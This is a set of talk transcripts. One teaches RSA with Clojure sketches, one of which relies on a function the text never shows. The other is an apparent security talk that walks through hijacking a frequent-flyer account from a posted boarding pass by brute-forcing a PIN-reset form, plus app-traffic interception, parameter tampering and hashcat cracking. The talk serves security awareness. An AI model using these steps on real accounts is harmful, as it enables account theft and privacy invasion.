totient of n. And that's the number of numbers between one and n which are relatively prime to n. Crazy, right? Who cares? Well, three mathematicians in the early 70s cared a lot. And I have this just called phi, and that's some relatively nasty Clojure code. But say the totient of 10 is 4, because there are four numbers in between one and nine inclusive that are relatively prime to 10. That's the totient of 10. Yeah, that's like, that's another ball to keep in the air. We're going to need that if we're going to do this. So, let's talk about RSA. We're going to combine all these pieces together. We're going to work out how to create a public and private key pair. It's not just any two numbers. And it's not just two primes. There are some other special things we have to do. That's kind of hard, okay? It's going to be weird to go through all that, to keep all this stuff in your head. What's not hard, and what I think will be mind-blowing at the very end, is when you see just how simple the math is.
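Here are self-contained sketches of the modular power and the totient, naive in the totient's case; these are my own illustrations, definitely not fast enough for RSA-sized numbers and not the speaker's repository code:

    ;; Modular edition of seed planting: same bit walk, but reduce mod m at
    ;; every step so the intermediate values stay small.
    (defn power-mod [base e m]
      (reduce (fn [acc bit]
                (let [sq (mod (*' acc acc) m)]
                  (if (= \1 bit) (mod (*' sq base) m) sq)))
              1
              (Long/toBinaryString e)))

    ;; Euler's totient: how many of 1..n are relatively prime to n.
    (defn phi [n]
      (letfn [(gcd [a b] (if (zero? b) a (recur b (mod a b))))]
        (count (filter #(= 1 (gcd % n)) (range 1 (inc n))))))

    ;; (power-mod 7 103 53) => 38
    ;; (phi 10)             => 4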
When you've got the key pair and you see the calculation that you do on the numbers that you send, that should leave you just a little bit mind-blown. And then you can go. And it's almost dinner time. So, that'll be great. All right. As a reminder, this is public key cryptography by these three guys, Rivest, Shamir, and Adleman; in 1972, or sorry, 1977, they published. There was, it was subsequently discovered, a British guy who discovered the same, proved the same theorem in 72, but it was classified. He couldn't publish it. So, poor guy. He doesn't get his name on the algorithm. But yeah, what we do is we generate these two keys, and if you want to send me a message, you take my public key and encrypt that message with my public key. I get the encrypted message, and I use my private key to decrypt it. All right. So, my public, I generate these two numbers. I give the world my public key. I keep my private key very secret. And when you want to send me something, you use my public key to do it. If I want to send you something, I have to have your public key to do it. So, it only works for you to send me stuff. You encrypt with my public key. I decrypt with my private key. So, here is how it works. Pick two big primes. Let's call them P and Q. What does big mean? All right. Big, you should ask a cryptography person, which I am not. There are people who give their whole lives to keeping up to date on what's going on in the implementations of the various algorithms and the actual libraries that we use as developers to do this stuff. I'm not one of those people. I know some. But big has some definition. It's 512 bits, 1024 bits, it's 2048 bits. It just kind of depends on how much computing power people have floating around to try to factor your numbers. So, that's a relative term and it's a moving target. It's going to get bigger as computers get faster. And I think the paranoid right now would use like a 2048 bit key. The not so paranoid, maybe 512 bits. That's what I mean by big. But pick a prime. What does that mean? Generate a random number of a certain size. What does that mean? Okay, again, that gets into implementation things. What's random? You know, you have to be careful about whether you're giving up any information in your random number generator. So, let's just say you've got some way of generating a big random number and then you use these probabilistic prime detectors to give you a good idea whether it's really probably okay that it's prime. You're almost sure. Two big primes, P and Q. Please multiply them. P times Q equals N. N is a number that we're going to use for the rest of this exercise. Now, if all you have is N and it's big, it is apparently an immutable fact of the created universe that it's really hard to figure out what P and Q might be. That's the whole thing here. If N is actually the product of two primes and I give you N, good luck figuring out what the primes are. That's the expensive thing. That's hard to do. If something were discovered that would make that easy to do, a lot of the world as we know it would collapse. I mean, I don't know if there could be war. I don't know. Seriously, that would be an incredibly consequential thing if somebody could figure out how to do that. But it's hard. If I give you N and it's P times Q, you have no idea what P and Q are without trying really hard. All right. So, you pick the primes, you multiply them. Good for you. Now, if you would please calculate Euler's totient of N, phi of N, and just keep that in your pocket.
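In practice the "pick two big primes" step leans on exactly those probabilistic tests. A sketch using the JDK's built-in helper, offered as an assumption about how you might do it rather than a recommendation on key sizes:

    (import 'java.math.BigInteger
            'java.security.SecureRandom)

    ;; Generate a random probable prime of the requested bit length.
    (defn random-prime [bits]
      (BigInteger/probablePrime bits (SecureRandom.)))

    ;; (def p (random-prime 1024))
    ;; (def q (random-prime 1024))
    ;; (def n (.multiply p q))   ; easy to compute, hard to factor back into p and q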
Now, that's actually expensive to calculate because you have to go through all the numbers between 1 and N and figure out whether they're relatively prime to N. That's a pain. Now, relative primality is not all that hard to figure out because what you really want to know is whether the greatest common divisor of the two numbers is 1 and we had Euclid's algorithm for doing that recursively that you saw was pretty quick even when I had those big long numbers. It just returned right away. So, you know, that's cool but it still takes a long time on a big number. Now, fortunately, we have a hack because these guys are prime. The totient of N is P minus 1 times Q minus 1. You are glad of that because that's cheap to calculate. And this is key generation. So, even if there's some expense here, it's okay. You don't do this often. This is the thing that you have to Google how to make, how to do with OpenSSL every three years when you generate a new key pair because it's been three years and you totally forget how you did it last time. So, it's rare and it would be okay if there was some computational cost. All right. If you would please find another random number D such that its greatest common divisor with the totient is 1, such that it is co-prime or relatively prime to the totient you just calculated. So, all you've done so far is you picked two big primes. That was a bit of a pain. You multiplied them. You stuck that aside. You subtracted one from each and multiplied them and you stuck that aside. And now you have to go through a little bit of rigmarole where you're going to generate random numbers. You're going to say, here's a candidate D and you're going to use Euclid's algorithm to fairly quickly figure out whether its greatest common divisor with respect to the totient of N is one. Got it? So, that could take you a minute. You're going to have to try a few times on that. You'll throw away a bunch of random numbers. Not so bad though. Now, I've got something. The gcd of D and phi of N equals one. That looks like the input to what we had half an hour ago. We're going to use the extended Euclidean algorithm in a minute because we have to solve Bézout's identity. Okay? This is A, the greatest common divisor of A and B. It happens to be one in this case. There's going to be an AX plus BY equals one. And maybe I want to know what X and Y are. So, let me show you how this works. Bring in that extended Euclidean algorithm if you please. AX plus BY equals one. Well, let's plug things in. I've got at the top D and phi of N. So, let's plug those in. D is going to be A. Phi of N, the totient of N, is going to be B. Well, here's what happens. What do I need at this point? I still need another key. D, I picked D, that stands for decrypt. That's going to be my private key. But I don't have a key to encrypt yet. So, let me show you where that comes from. That's going to be X. X is going to pop out of the extended Euclidean algorithm and that is going to be my encryption key or my public key. And Y, or I'll rename it F, is actually waste heat that just gets expelled by this process. We don't care about that number at all. So, we pick either X or Y, whichever is positive. It doesn't matter. So, there you go. D times E plus phi of N times F equals one, extended Euclidean algorithm, and you go to town. It's incredible. There you have your stuff. And at that point, you take E and N and print them on t-shirts and put them in your email signature, do whatever you want with them. That's your public key. You want lots of people to know that.
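Pulling the pieces together, key generation might look like this in Clojure. This sketch reuses the extended-gcd function above; instead of just picking the positive Bézout coefficient, it normalizes the coefficient mod the totient, which comes to the same thing for these numbers:

    ;; Small-number demo of RSA key generation; real keys use huge primes.
    (defn generate-keys [p q d]
      (let [n       (* p q)
            totient (* (dec p) (dec q))
            [g x _] (extended-gcd d totient)]
        (assert (= 1 g) "d must be coprime to the totient of n")
        {:public  [(mod x totient) n]   ; e, the positive inverse of d mod the totient
         :private [d n]}))

    ;; (generate-keys 89 113 299) => {:public [4483 10057], :private [299 10057]}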
D and N, or you could say just D, is kept secret. That is your private key. And because of that, we have an internet. Now, let's, yeah, let's look at that. So, that's kind of hard, right? There's a bunch of pieces you had to mix together to make that happen. To send a message. So, I'm going to send you a number, and, you know, maybe it's text, maybe it's an image, whatever. It's a number. Okay, I make it into a number. And I'm going to call that number M. I take E and N. Those are the numbers I have to have lying around to encrypt and get the message I can send in the clear. That's all I do. M to the E mod N equals C. At that, the first time I saw that, that blew my mind. It's not hard. Maybe they're big numbers, and maybe it's a pain. Fortunately, I showed you modular seed planting a few minutes ago, and now you know how to do this quickly and efficiently without getting too carried away. But that's all you got to do. Then you can send C in the clear. And the only way to turn C back into M is if you know D. C to the D mod N equals M. And as a result of that, we get to have an internet. Now, let me, I got a few minutes. So let me just do that with some numbers. I have some numbers like a cooking show where there's, you know, we mix something up. We say, put this in the oven for an hour, and then I go to this other oven and I open it. And I say, oh, look, it's done. I got some numbers prepared for us just to keep this from being too tedious. I need a P and a Q, right? So let's say I'm going to define P as 89. Now, P happens to be prime, or 89 happens to be prime. Just trust me on that. You can check me later. Q, I'm going to pick another prime, and that's 113. Now, I have, what do I call this? Prime? No, I have a prime checker. You're going to take my word for it. So then I'm going to define N as the product of P and Q. All right? So that's N, that's P, and that's Q. Now, I have to compute the totient of N, phi of N, and that's just going to be phi of N. I've got a function to compute totients. And in this case, the totient of 10,057 is 9,856. And so I have this symbol sitting around now that does that work. What was the next thing I had to do? I need a D, don't I? Now, the way I come up with D is I cast about for random numbers, which is kind of weird in terms of implementation. I have to be careful with that. But I go, I go, and I generate random numbers, and I test them to see if their greatest common divisor with phi of N equals 1. Now, like a good cooking show, I happen to know 299 works. And let's just test that. Greatest common divisor of D and phi of N is 1, we're set. So now I have P, Q, N, and D. What do I need? E. I got to have E. And so I need the extended Euclid. By the way, let's, that's unpleasant if you don't know Clojure. There's some looping constructs and things in there. Don't let it bother you. But that's what the code looks like. And so we're going to say the extended Euclidean algorithm on A and B. So that was D and phi of N. Yes? I'm going to go back to my slide. I'm actually confused now. So math is hard. Yeah. So we had A and B were D and phi of N. So that's good. D and phi of N. That gives us two numbers, 4,483 and negative 136. We're just going to pick the positive one. So we will define, yeah, E as the max of all of those numbers. And now we have, oh, yeah, that worked. Let's try apply max. And now E is 4,483. So I have P, Q, N, D, and E. So I can define a message. Somebody give me a four-digit number. Okay. It's funny.
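And the punchline really is that small: encryption and decryption are each one modular exponentiation. A sketch reusing the power-mod function above, with the demo numbers from the talk:

    (defn encrypt [m [e n]] (power-mod m e n))
    (defn decrypt [c [d n]] (power-mod c d n))

    ;; (def public-key  [4483 10057])
    ;; (def private-key [299 10057])
    ;; (decrypt (encrypt 1234 public-key) private-key) => 1234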
That never happens. And you said it, like, why are you even asking me, obviously. And I, fair enough. So, and I can use my seed planting, power seed planting, actually power mod guy to say, well, we want M to the D mod N. So let me now hand off 7,035 to somebody, and nobody in the world will know what that means, 7,035, unless they are in possession of E, in which case they can get back to being leet again. And that, my friends, is why the internet is commercially useful. So the Clojure code is there, should you happen to be interested. There's also some other fun discrete math tricks like how to figure out whether a 13-digit ISBN is valid. You know, it's stuff that really matters to you. Keeps you up at night. So, and thanks. You guys have a great day. And thanks for another visit to Oslo.
|
What do you need to know about prime numbers, combinatorics, and the underpinnings of public key cryptography? Well, maybe more than you think! In this talk, we'll explore the branch of mathematics that deals with individual, countable things. Most of the math we learn in school deals with real-valued quantities like mass, length, and time. However, much of the work of the software developer deals with counting, combinations, numbers, graphs, and logical statements: the purview of discrete mathematics. Join us for this brief exploration of an often-overlooked but eminently practical area of mathematics.
|
10.5446/50872 (DOI)
|
Alright, welcome everyone. This is a good turnout. Look at this. Who was here for my talk a couple of days ago? Everyone. A lot of people. So a couple of days ago we looked at a whole bunch of online attacks that had happened in the past. So real world attacks, things that had actually happened and there were lots of PowerPoints. And the PowerPoints are kind of good because you get to see a little bit of info and some real world stuff, but we didn't get to break anything and I left feeling really empty. So today we're going to break a bunch of stuff in a talk that I have called How I Hacked Myself to Norway. So for those that don't know me, I'm Troy Hunt. I'm at TroyHunt.com and @troyhunt. And a lot of what I'm going to talk about today is online on my blog or in my Pluralsight courses or places like that. So if you want more info, go and get it from there or wine me after. So where I thought we'd start is to give you a bit of a context of why I'm doing How I Hacked Myself to Norway. And the thing is Australia is a very, very long way away from Norway. Now sometimes I say this and people go well Australia isn't that far away is it? That's not Australia. They're the guys with the mountains and the lederhosen. So that's not us. We're the guys with Mick Dundee and the drop bears. So they're the ones that you want to watch out for. Now if you don't know a lot about Australia you can go and Google it and what you'll find is that it is a very, very long way away and it's about 15,000, 16,000 kilometers away. And what you'll find is that it's a very expensive trip to get from Australia all the way over to here. So before I left I decided I'm going to need some spending money. So I went out and I grabbed some credit cards and I thought this would be a good way to start. Now does anyone want to guess where I got these credit cards from? Shut up. Okay, so those who didn't hear the gentleman at the front, the noisy Irishman, I got them from here. Hey, people put their credit cards on Twitter. Why do they do this? You know taking photos of your breakfast is one thing, this is a whole other thing altogether. You know it's a social thing, they get excited and they want to share everything they're doing. So of course they've got to take a photo of it and they've got to put it up on Twitter. I particularly like this one. Oh my God, I'm so happy here's my credit card. Now here's the funny thing because if you jump over onto Twitter you'll find that there is an account that is called Need A Debit Card. And Need A Debit Card very conveniently retweets photos that people take of their debit cards. I really like this one because he took a photo of the back of his arm. So that was enormously convenient and I'm ever grateful. Now the thing that strikes me with this is that when we look at people posting credit cards on the internet we forget how easy they are making things to break. So everybody's worried, well we were worried about the Chinese, now we're worried about the Americans. We probably should be a little bit worried about everyone. But what I find interesting is when we're worried about the NSA we're worried about the fact that they've influenced cryptographic standards and broken random number generators and have done all this fancy, fancy stuff and then we've got these guys just going here's my credit card. Take it. So the point of this is that we're getting into this era where breaking security is often really easy because it's just so in front of us. It is not a hard problem.
Now to that effect I was looking at my Facebook the other day and a friend of mine posted this and he was very excited because as you can see from the bottom he was doing a fist pump because he got a first class upgrade. I was doing a fist pump because he gave me his boarding pass but it begs the question what can we do with the boarding pass? This is real too I didn't make this one up. I better get his name off the screen. Oh crap. Okay so on the boarding pass we have things like a name and we have a frequent flyer number. This is enormously convenient because we can go and do things with this. It's a Qantas frequent flyer number. Now if you take a look at the Qantas mobile app one of the things the Qantas mobile app lets us do is log in with a membership number, a last name and a pin. Just one point on pins. What I secure my luggage with is not a suitable pin to secure my millions of frequent flyer points and my travel history and my family names and everything else but somehow pins have become a thing. Now moving on what we can do is we can go through and say that we have forgotten our pin. Now if we have a membership number and a last name, who knows where we get that from, we can then go through and do a reset process. The problem with the reset process is that if we do this they're going to send him an email with the details of the reset. Now I don't want to send him an email because it kind of blows the point. But if we go over to the website then we can start to do something a little bit more interesting. We have two options. Send a temporary pin or don't send a temporary pin. Now the other thing is this Qantas website's got a little triangle on the padlock. Everyone know what the triangle means? A little yellow triangle? It means don't trust it. So it's been loaded over HTTPS, it's an HTTPS address but then it's put something else on the page that is not HTTPS. We can't trust that piece of content. And a little bit later on we're going to see exactly what it means not to be able to trust a piece of content on the web. So for now it needs a membership number and a last name. Now that much I can get. So what I'm going to do is we're going to fill this out. We're going to get the data off the boarding pass, fill in the details, obfuscated details, give it a last name. Now I don't want to send it to his email address because clearly that's not going to work in my favour. So we'll do this. So next up, we're going to need three different pieces of information. And in the first section I can have either his mother's maiden name which I've got no idea about or I can have one of the last few flights that he's taken. Which begs the question, where am I going to get one of the last few flights that he's taken? Served up on social media. So thank you very much. We'll just take all that information. There's your carrier and flight number. There's your first class fist pump. Flight date. Very good. Okay. So we've got all that information. Now we need two other pieces of information. That's what this additional information bit down the bottom is. And one of these pieces of information is extremely easy to find out in the era of social media. So if I want to find out his birth date, I could just look at his profile and see everyone saying happy birthday. Not only happy birthday on a date but happy 30th or 40th or whatever it was at the time. So we get a year as well. So birthday, that easy. We have many, many, many, many ways of getting birth dates off people in this day and age. Now the other two.
Obfuscated. Obfuscated. Mailing address. So he's moved around a bit. I don't know the mailing address and if you don't get the string just perfect then it doesn't match up to what's in the database and the whole thing falls on the heap. Now the date of joining is a little bit interesting though. So here's what I'm going to do. With the date of joining, we're going to put in some sort of random date. Jan, keep going, keep going, keep going, 1990. Now it's probably not going to be right but it doesn't matter that it's not right. So let's try that. Okay. It doesn't work. Now before I did this, I opened up Fiddler. So who uses Fiddler? Those of you that don't should. It's very, very good. So Fiddler is an HTTP proxy tool and it can capture all of the requests that you make from your machine and as we'll see in a little bit of time, also the devices that are around you. So what I did is I captured that request in Fiddler. So at the top left there you see it was request number 22. It was going to qantas.com.au. What I've done is I've taken that request and I've dragged it into Fiddler's Composer. So Fiddler has a tool that lets you take a request, put it in the Composer and then see everything that was in that request and reissue it. So we see we've got request headers which is a great big bit in the middle and because it was a post request it's got a body which is everything down the bottom right. So what we're going to do is take a look at what's in that body and in the body we have the month of joining which is what we just filled out before, number one, Jan. And we've got the year of joining being 1990. If we increment it and change it to two and reissue the request, we get another response. The response has an identical body size so it's probably going to be the same message that's come back and that message was the one that said, sorry some of your information is incorrect. So keep trying. Three, four, five, six, seven, eight. Same response, same response, same response, same response. And then finally we get a response that's bigger. Okay, this one's just over 7K. So what ended up happening was that response was the one that said, okay, you have now got the information correct. You have picked the right month of joining and year of joining as well as the other data which we knew was right because he gave it to us on his boarding pass. So all of that's gone off to the server. And the first interesting thing here is that Qantas and many companies do this, I don't want to just pick on Qantas, but Qantas has got brute force protection on the login. So they don't want people to try logging in too much with a particular membership number and sort of random pins because otherwise, you know, it's a membership, it's a four digit pin. So you've got 10,000 possible options. You're going to knock it off on average in about 5,000 guesses. Probably less because there's common pins and you go through a dictionary. But what they don't do and what many don't do is there's no brute force protection on the process to reset the pin. So it doesn't matter that I can't log on, that I don't have the right pin because I can just go and reset it anyway. So that then allowed me to go into the website because now I know the month and the year of joining, fill that in, back into here. Now I've successfully verified my identity and it's going to let me change the pin, which is great. So I can put in my own pin. Confirm the pin and we'll update. And we're done. Forgotten pin confirmation. We have his account.
So that was how easy it was. So what can you do when you get his account? Well, once you're into a frequent flier account, obviously you get all travel history. You can go and buy tangible things to send to yourself. You can buy other people tickets. You can buy me a ticket. It can only be spouses and significant others. So I do have to be his gay lover, but I can get a ticket. And because this is being recorded just for the record, I didn't do it just like this. I used my own account to test where the issues were. So, mate, I didn't steal your points, don't worry. Relax. All right. So that's a pretty sort of obvious basic kind of set of risks. What I thought we might take a look at next is around mobile devices. And all of us have got a heap of mobile devices. Most of us in the room have probably got two or three IP addresses. A lot of them are probably talking over the Internet, but I'm going to come back to that because it's going to be a bit interesting later on. Now, how many apps do you think most devices have on them these days? Most phones, tablets. Any guesses? I heard a 50 here. So the sort of commonly accepted wisdom is somewhere around 40 to 50 different apps on most mobile devices. Now, how many of those do you think have serious security vulnerabilities in them? Every time I ask, someone always says all of them. So based on what I look at and I go through and look at a bunch of apps, I would say probably about half the ones I see have serious vulnerabilities in the way they communicate over the web. And what I thought I might do is talk about some of the cases I've seen and then show you how we can identify it in one and another live demo. So one of the ones I saw quite recently was reviewing an app. And normally when I review a mobile app, the first thing I'll do is I'll proxy the data from the device through Fiddler. And we'll do this in a second so you'll be able to go away and do it yourself to your own apps later on. Now, when I proxy the data through this, I could see the web service that it was hitting and I could also discover other web services. So often, depending on the technology stack, web services are very nicely documented. You find one and there's another page that lists all the other web services. Now, one of those other web services was called Get Users. And true to its word, it did exactly what it said it would. It got users. It got every user and every username and every password. And it returned it all over a nice API in JSON. So it was a nice fast request. And when I found this and I spoke to the developers and said, look, I think we've got a little bit of a problem. This is what I found. And I said, look, all I did was I just proxied the data through Fiddler and I found this. And they said, oh, it doesn't matter. Our users don't use Fiddler. This is a true story. I kid you not. So I think the lesson there is that we do become very complacent. So we build systems with an intended function and an intended way of being used and we expect everybody to play nice and do it that way. And the reality of it is there are people out there who don't want to play nice and unlike me, actually have an evil intent as well. That's one. Another one recently, this was around a bank. And in fact, I was preparing a demonstration for TechEd. And I wanted to show an app that did security very well when it came to validating SSL certificates. And I looked at this bank before, just a random, I wonder what this app does. Open it up, bang, there we go. Everything's okay.
So what should normally happen is if you proxied data through something like Fiddler, Fiddler can create a self-signed certificate for HTTPS requests. So it can actually return a certificate that won't be valid on the client, it's self-signed. It's not issued via a certificate authority. But it does mean that there can be an HTTPS communication. Now normally, the device, if it gets a self-signed certificate that's not valid, will throw its hands up and say, no, this doesn't check out. It's like every now and then you go to a website in the browser and Chrome goes all red and it says this certificate is invalid. It's not the right certificate or if it's expired or something like that. So mobile apps normally do that. And basically every modern protocol or every modern framework that allows you to make HTTP requests does this implicitly. You have to consciously go and turn off certificate validation. This bank had done that. It was one of our largest banks in Australia. So they had actually turned off the certificate validation. Now I imagine it was very convenient because for the developers, they didn't have to worry about getting certificates on the machine. We'll just turn it off and we'll ignore it and then we can just do whatever we want. Of course, the right way to do it is to actually create a self-signed certificate and trust it on the device. So effectively compromise your own device in order to be able to test your mobile app. These guys didn't do that. So one more before I move on. There was an incident with Westfield shopping center in Bondi in Sydney and I wrote about this a few years ago. So it's a big sort of detailed blog post on this. And these guys had a mobile app where if you went to the shopping center and then you spent all day shopping and mucking around and losing track of time and then you went to try and find your car again and you couldn't find your car because it was a big shopping center, you pull out the app, you put in your number plate and it comes back with these four grainy pictures. They're sort of obfuscated. You can't quite see the number plate but you can see if it's a big SUV or a little red sports car, whatever it may be. And you click on the one you want and it says, okay, here it is and you can go and find it. So they'd gone to some length to make sure there was no personally identifiable information such as a number plate. So that was good. The bit that was not so good is that the response behind that, so the JSON response that had the position of the car park and the, I guess the ID of the image also had the number plate. So it was actually sending that number plate back. So once you proxied the traffic, you could get that request, run it again manually and get four results. Now the way they made you only get four results is they passed four in the request. So here we go. You could change four to 40. You could change 40 to 4,000. You could get every single vehicle in the car park just by parameter tampering. Now that's not the way the app's meant to work but it's just an HTTP request. You can find it very, very easily. The other thing you can do is you can run it every 60 seconds so you can start to profile traffic coming and going. You can start stalking people. When does this person arrive at the... You could probably do a very nice app in today's cloud world where you get notifications as soon as this car goes into the shopping center, and do terrible things.
But the other thing these guys did is for the sake of convenience they also had the control centers for the shopping center on the same IP address that the service was on. So once you took out the path of the API, it exposed the paths to do things like change the number of available spots in different car parks, change the wording on the signs, which I did not do. So I spoke to those developers as well and firstly they did feel rather bad about it because it made a lot of press in Australia and it didn't look very good for Westfield. And they said, look, the reason why they did it is because it meant they could write the one API and they could use it everywhere for their admin system as well as for mum and dad who just lost the car. Reuse. But a very bad example of reuse. So let's have a look at what this looks like. And here's the example I thought we'd used. So on my way here getting back to the theme of the talk, I'm in Heathrow and I'm trying to get Wi-Fi access. And like most airports, Wi-Fi access is terrible. And you get on this thing and it gives you 45 minutes and it's crap the whole 45 minutes anyway. It's terrible speed. Then it says you've got to sign in and you've got to get more Wi-Fi access by handing over all your information. And then I found a spot that had good Wi-Fi. A spot they wouldn't let me into. So I'm standing at the front here and thinking, all right, well, what can we do in order to maybe see how we can get some British Airways Wi-Fi? And what I found was that I had the British Airways app on my phone and I still had crappy public connectivity. Now the British Airways app has a feature where if you are a silver or gold executive club member, you can get Wi-Fi passwords. Now I'm not a silver or gold executive club member, but let that not deter us. So here's the demo we're going to run. So what I did to my iPhone is I set it up to proxy traffic through my PC through Fiddler. So anyone that has an iOS device can easily do this. And we're going to do this with my phone now. Other devices have different ways of setting up proxies, but the bottom line is that you can say I want all the traffic from here to go through there and we're going to watch it as it goes. So my phone is currently set up something like this. It's a different IP address. It's the IP address of my PC at the moment. And what we're going to do is we're going to go over to Fiddler. Now you can get Fiddler from getfiddler.com. It's free. It's awesome. It's been tracking some requests here that I'm going to get rid of. Now all you do to enable this in Fiddler is we go up to tools, Fiddler options, connections. Now Fiddler is listening on port 8888. So that's what we had over here, just there. And we are allowing remote computers to connect. Now once we do that, I can unlock my phone and if I open up, say Safari and I refresh and I find I've got no internet connection because it's died again, I'll just get my internet connection back. Hmm. Or my phone is no longer connecting because maybe my IP address has changed and this is the joy of the live demo. I saw a lot of demos fail earlier this week. Okay, so let's check this and if I can't get the IP address right, then I will go to my backup save trace. So what I'm doing, the IP address, so that I can probably get it right as well, so here's my IP address, 10, 15, 5164. 10, 15, 5164. It should be right. But if it doesn't work, I will open up my save Fiddler trace and it won't matter. I'll give it one more go. That wasn't me. Somebody hack me? Mr. AV man? 
Well, that's good. You fix that. I'll fix my Wi-Fi. Listen, just because you're... All right, so while that is being fixed, we'll... Did I stand on it? Did I hack myself? Crap. Okay. We're coming back. Actually, while the screen's gone. Okay, it's coming back. So while the screen was there and you couldn't see what I was doing, I just fixed everything and made it work and it looks like... So while he's doing that, you can actually do this with any of your apps. I mean, at the end of the day, when you open your apps, they're requesting data that the provider is happily sending down to you and sending into your phone. You can sit just here and see what's going backwards and forwards. So some of the sort of things that I often see go backwards and forwards. A couple of funny ones, particularly things like really, really inefficient requests. I wasn't... Oh, I'm switching my story. Okay, I'm sorry. I'll come back to the inefficient request. So while he was away and I made everything work, when I opened that British Airways app, I had several requests. We can see here British Airways. Now, one of these British Airways requests went here, lounge. We can go and look at the data in lounge. And if we look at the data in lounge, they have very kindly sent us all the Wi-Fi passwords. Yay! Now, let's be clear. They sent them to me. All I did is... And also, seriously, all you do is download the app, install it, and they send you the data. Now, to bring this back to a point about application security, they are making the assumption that the authorisation is going to happen on the device. So they're just going to give you everything and you're only going to be able to unlock the feature on the device when you provide your particular membership details and it authenticates you. But they've already sent you the data. They're just not expecting that you can go and get it in a way that they didn't intend. Now, to finish my story, one of the things you often find is particularly really, really grossly inefficient requests, which is particularly bad on mobile devices because, of course, you're on 3G and they're bad connections and you've got batteries to worry about and things like that. So I'll often see things like you'll go to, say, magazine app. And in fact, I saw one for FoxTel in Australia, so I paid TV. And in the FoxTel app, you'd have all the channels and you'd have tiny, tiny, tiny little bitmaps of each channel. Now, they look tiny, but they're actually about this big, they're huge. Each one of them was like a megabyte. And they were downloading a megabyte of image each time you opened up the app. And that's one megabyte just for each channel. And then you got a whole bunch of channels. And I tweeted something about it and the guy who was involved in it responded. And he actually had a very good reason for it. That was just how he was given the images. Interesting. Go to Nick's performance talk. Learn how to compress images. It's easy. All right. Let's try and get us back on track. So eBay. eBay a couple of weeks ago got hacked. And eBay said they had 145 million active accounts hacked. They didn't tell us how many inactive accounts were hacked. And as funny as that sounds, when Adobe got hacked last year and around October, they kept saying they had some tens of millions of accounts hacked. 20, 30 million. I have 152 million Adobe accounts. And I have them because they're all published publicly. So often when there is a breach like this, the scope of it is underestimated for obvious reasons. 
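Coming back to the lounge Wi-Fi example for a moment, the underlying fix is to do the authorisation check on the server and only then return the sensitive data, rather than shipping everything to the device and letting the app decide what to show. A rough sketch with hypothetical names; this is not British Airways' actual API:

[Authorize]                                         // requests must carry an authenticated identity
public class LoungeController : ApiController
{
    private readonly IMemberRepository _members;    // hypothetical lookups
    private readonly ILoungeRepository _lounges;

    public LoungeController(IMemberRepository members, ILoungeRepository lounges)
    {
        _members = members;
        _lounges = lounges;
    }

    public IHttpActionResult GetWifiPasswords()
    {
        var member = _members.FindByUserName(User.Identity.Name);
        if (member.Tier != Tier.Silver && member.Tier != Tier.Gold)
            return StatusCode(HttpStatusCode.Forbidden);    // the data never leaves the server

        return Ok(_lounges.GetWifiPasswords());
    }
}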
So for eBay, I suspect, and all we've got to do is just think about the size of it and the scale of it, that in all likelihood there are a lot more than 145 million. Anyway, what I was interested in is the way Adobe, or rather eBay, was storing their credentials. And when I was reading around a little bit, I found some info. So Ask eBay, the official verified Ask eBay account: we store encrypted passwords that have been hashed and salted. What's wrong with this sentence? You'll find out in a moment. The main thing being that encryption and hashing are very different processes. They're both cryptographic processes, but encryption is a two-way thing with private keys, you encrypt and you decrypt, and there are other semantics that make it fundamentally different to hashing and salting, which we are going to have a look at in a moment. So that was a little bit confusing. So I read a little bit further, and I found the official eBay statement from when the breach occurred. And the official eBay statement said that they were encrypted passwords. Okay, good. So they're encrypted. They're not hashed. Then I read some more, and the eBay spokesperson said that they were using a sophisticated proprietary hashing and salting technology. Now when we talk about the attributes of cryptography, proprietary isn't normally the one we're looking for. I've seen proprietary encryption before and it was called Base64. Now the point is we have got to get away from this "we encrypted data" when what we really did was hash data. These are two fundamentally different things, and for God's sake stop saying that they're encrypted when they're hashed, because people hammer you every single time, because you shouldn't be encrypting passwords. What we should be doing is hashing them. Not quite like that, but, you know, try and find a better hash image that isn't a hashtag. Now the idea of a cryptographic hash is that it is a one-way deterministic algorithm. What it means is you have a piece of text like a password. Say it's password but it's got a zero instead of an O so other people can't figure it out. And you create a hash: it creates a cypher, it creates an output. Now you might use an algorithm like, say, MD5, for argument's sake. Every time you hash the word password-with-a-zero with MD5, it doesn't matter where you are, what PC it is, where it is in the world, what language it is, you always get the same cypher. That's the deterministic part of the hashing algorithm. So what we used to do is we would hash the password and we'd store the hash in the database next to the username and the email address and all that other stuff. When someone comes and logs in, we take the password they give us, we hash it with the same algorithm, and because it's deterministic, if it's correct it will match the one in the database and then we can say, okay, you can log in. Now the problem that we had with that is that you can pre-compute all these hashes. You can get all these common passwords and create what we used to call rainbow tables, and then you take the rainbow table and you can compare it to the hashes from a breached database, and when it matches, the rainbow table also has the plain text. Messes it right up. So we started adding salt, and the idea of the salt is that once we have salt on a password we have randomness. So what you might do is you create, say, 32 random bytes, you get the password, you put the salt with the password, then you hash those and you store it in the database.
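A minimal C# sketch of exactly that salt-then-hash scheme, illustrative only, and deliberately the old single-round approach that is about to get cracked:

using System;
using System.Linq;
using System.Security.Cryptography;
using System.Text;

static class PasswordHasher
{
    // Returns the salt and the hash; both get stored next to the user record.
    public static Tuple<byte[], byte[]> HashWithSalt(string password)
    {
        var salt = new byte[32];                            // 32 random bytes, as described
        using (var rng = RandomNumberGenerator.Create())
            rng.GetBytes(salt);

        var salted = salt.Concat(Encoding.UTF8.GetBytes(password)).ToArray();
        using (var sha1 = SHA1.Create())                    // one fast round: the weakness shown next
            return Tuple.Create(salt, sha1.ComputeHash(salted));
    }
}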
So you store the salt and you store the cypher. When someone comes to log in you use the username to pull the salt back, add it to the password they've just given you and hash it. So it ultimately looks a little bit like this: hashing of the salt and the password, and that creates the cypher. Now in your database you then have something that looks like this. So you get a whole bunch of salts and a whole bunch of hashes, one of these for each person. So this is what we'd refer to as a salted hash. Now is this a suitable mechanism of password storage? Shaking heads. Other people not wanting to say. So I'm going to give you an example. What we see here is salted hashes from the ASP.NET membership provider, the one that came with the Visual Studio 2010 project. So if you've ever written ASP.NET web applications you have probably done something like this before and thought it was safe. And I'm going to show you why it's not. So here's what we're going to do. I have a little tool here called hashcat. And what hashcat is, is a GPU-based password cracker. And what that means is we can run this command. And this command is saying let's run CUDA hashcat. So CUDA is Nvidia's GPU technology, which is what this machine runs on. It's just a little laptop. You could also do it with OCL, which is what you'd use with, say, an AMD graphics card. But it's going to do the cracking on the GPU. It's going to run this against hash mode 141, which is the ASP.NET membership provider. So we're effectively saying it's one round of salted SHA1. It's going to take saltedhashes.txt, which is basically what I showed you on that last slide, salts and hashes. And it's going to use my hashkiller dictionary. Now this is a password dictionary with about 22 million plain text passwords in there. All it is, row by row by 